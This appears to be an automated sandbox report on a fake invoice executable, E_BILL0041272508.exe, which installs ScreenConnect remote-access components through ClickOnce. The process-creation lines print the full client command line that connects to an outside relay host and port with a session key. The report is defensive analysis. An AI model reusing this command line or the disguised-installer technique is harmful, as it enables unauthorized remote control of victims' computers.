Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior

Reads the System eventlog

Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior

System Summary

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: E_BILL0041272508.exe

Contains functionality to launch a process as a different user

Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe

Code function: 8_2_05C02180 CreateProcessAsUserW,

8_2_05C02180

Creates files inside the system directory

Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp			Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ScreenConnect.ClientService.exe.log			Jump to behavior

Detected potential crypto function

Source: C:\Users\user\Desktop\E_BILL0041272508.exe	Code function: 0_2_009BA495	0_2_009BA495
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 2_2_00007FFD347C2471	2_2_00007FFD347C2471
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 2_2_00007FFD347AD5B5	2_2_00007FFD347AD5B5
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 2_2_00007FFD347C31B8	2_2_00007FFD347C31B8
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 2_2_00007FFD347A329D	2_2_00007FFD347A329D
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 2_2_00007FFD347B5D9A	2_2_00007FFD347B5D9A
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 2_2_00007FFD347A9D9D	2_2_00007FFD347A9D9D
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 2_2_00007FFD3479AEF5	2_2_00007FFD3479AEF5
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 2_2_00007FFD347AAE5F	2_2_00007FFD347AAE5F
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 2_2_00007FFD347A9738	2_2_00007FFD347A9738
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 2_2_00007FFD347B2850	2_2_00007FFD347B2850
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 2_2_00007FFD347B3111	2_2_00007FFD347B3111
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 2_2_00007FFD34791211	2_2_00007FFD34791211
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 2_2_00007FFD34796178	2_2_00007FFD34796178
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 2_2_00007FFD3479F451	2_2_00007FFD3479F451
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 2_2_00007FFD347B4F17	2_2_00007FFD347B4F17
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Code function: 8_2_05C0B050	8_2_05C0B050
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD34777138	9_2_00007FFD34777138
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD34782755	9_2_00007FFD34782755
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD347820B0	9_2_00007FFD347820B0
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD347710CF	9_2_00007FFD347710CF
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD347710D7	9_2_00007FFD347710D7
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD34A8BD34	9_2_00007FFD34A8BD34
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD34A8DD9D	9_2_00007FFD34A8DD9D
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD34A85731	9_2_00007FFD34A85731
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD34A85944	9_2_00007FFD34A85944
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD34A8022D	9_2_00007FFD34A8022D
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD34A8D1D4	9_2_00007FFD34A8D1D4
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD34A86E3D	9_2_00007FFD34A86E3D
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD34A85D9C	9_2_00007FFD34A85D9C
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD34A80058	9_2_00007FFD34A80058
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD34A85F86	9_2_00007FFD34A85F86
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD34A802F2	9_2_00007FFD34A802F2
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD34A80328	9_2_00007FFD34A80328
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD34A802C0	9_2_00007FFD34A802C0

Uses 32bit PE files

Source: E_BILL0041272508.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: ScreenConnect.WindowsBackstageShell.exe.2.dr, PopoutPanelTaskbarButton.cs	Task registration methods: 'CreateDefaultDropDown'
Source: ScreenConnect.WindowsBackstageShell.exe.2.dr, ProgramTaskbarButton.cs	Task registration methods: 'CreateDefaultDropDown'
Source: ScreenConnect.WindowsBackstageShell.exe.2.dr, TaskbarButton.cs	Task registration methods: 'CreateDefaultDropDown'

Source: ScreenConnect.Windows.dll.2.dr, WindowsExtensions.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: ScreenConnect.Windows.dll.2.dr, WindowsExtensions.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: ScreenConnect.Windows.dll.2.dr, WindowsExtensions.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: ScreenConnect.ClientService.dll0.2.dr, WindowsLocalUserExtensions.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: ScreenConnect.ClientService.dll.2.dr, WindowsLocalUserExtensions.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)

Source: classification engine

Classification label: mal72.troj.evad.winEXE@11/68@3/2

Source: C:\Users\user\Desktop\E_BILL0041272508.exe

0_2_009B1000

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

File created: C:\Users\user\AppData\Local\Deployment

Jump to behavior

Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Mutant created: \BaseNamedObjects\Global\netfxeventlog.1.0

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

File created: C:\Users\user\AppData\Local\Temp\Deployment

Jump to behavior

Source: C:\Users\user\Desktop\E_BILL0041272508.exe

Command line argument: dfshim

0_2_009B1000

Source: E_BILL0041272508.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\E_BILL0041272508.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: E_BILL0041272508.exe	ReversingLabs: Detection: 18%
Source: E_BILL0041272508.exe	Virustotal: Detection: 13%

Source: unknown	Process created: C:\Users\user\Desktop\E_BILL0041272508.exe "C:\Users\user\Desktop\E_BILL0041272508.exe"
Source: C:\Users\user\Desktop\E_BILL0041272508.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe"
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=mmf351.ddns.net&p=8041&s=b044e727-8609-4a6c-b885-92d6249fd38a&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1"
Source: unknown	Process created: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=mmf351.ddns.net&p=8041&s=b044e727-8609-4a6c-b885-92d6249fd38a&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1"
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe" "RunRole" "83265b87-0d31-430d-be3a-51c1a25f31d5" "User"
Source: C:\Users\user\Desktop\E_BILL0041272508.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=mmf351.ddns.net&p=8041&s=b044e727-8609-4a6c-b885-92d6249fd38a&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1"	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe" "RunRole" "83265b87-0d31-430d-be3a-51c1a25f31d5" "User"	Jump to behavior

Source: C:\Users\user\Desktop\E_BILL0041272508.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\E_BILL0041272508.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\E_BILL0041272508.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\E_BILL0041272508.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\E_BILL0041272508.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\E_BILL0041272508.exe	Section loaded: dfshim.dll	Jump to behavior
Source: C:\Users\user\Desktop\E_BILL0041272508.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\E_BILL0041272508.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\E_BILL0041272508.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\E_BILL0041272508.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\E_BILL0041272508.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\E_BILL0041272508.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\E_BILL0041272508.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\E_BILL0041272508.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: dfshim.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: dpapi.dll	Jump to behavior
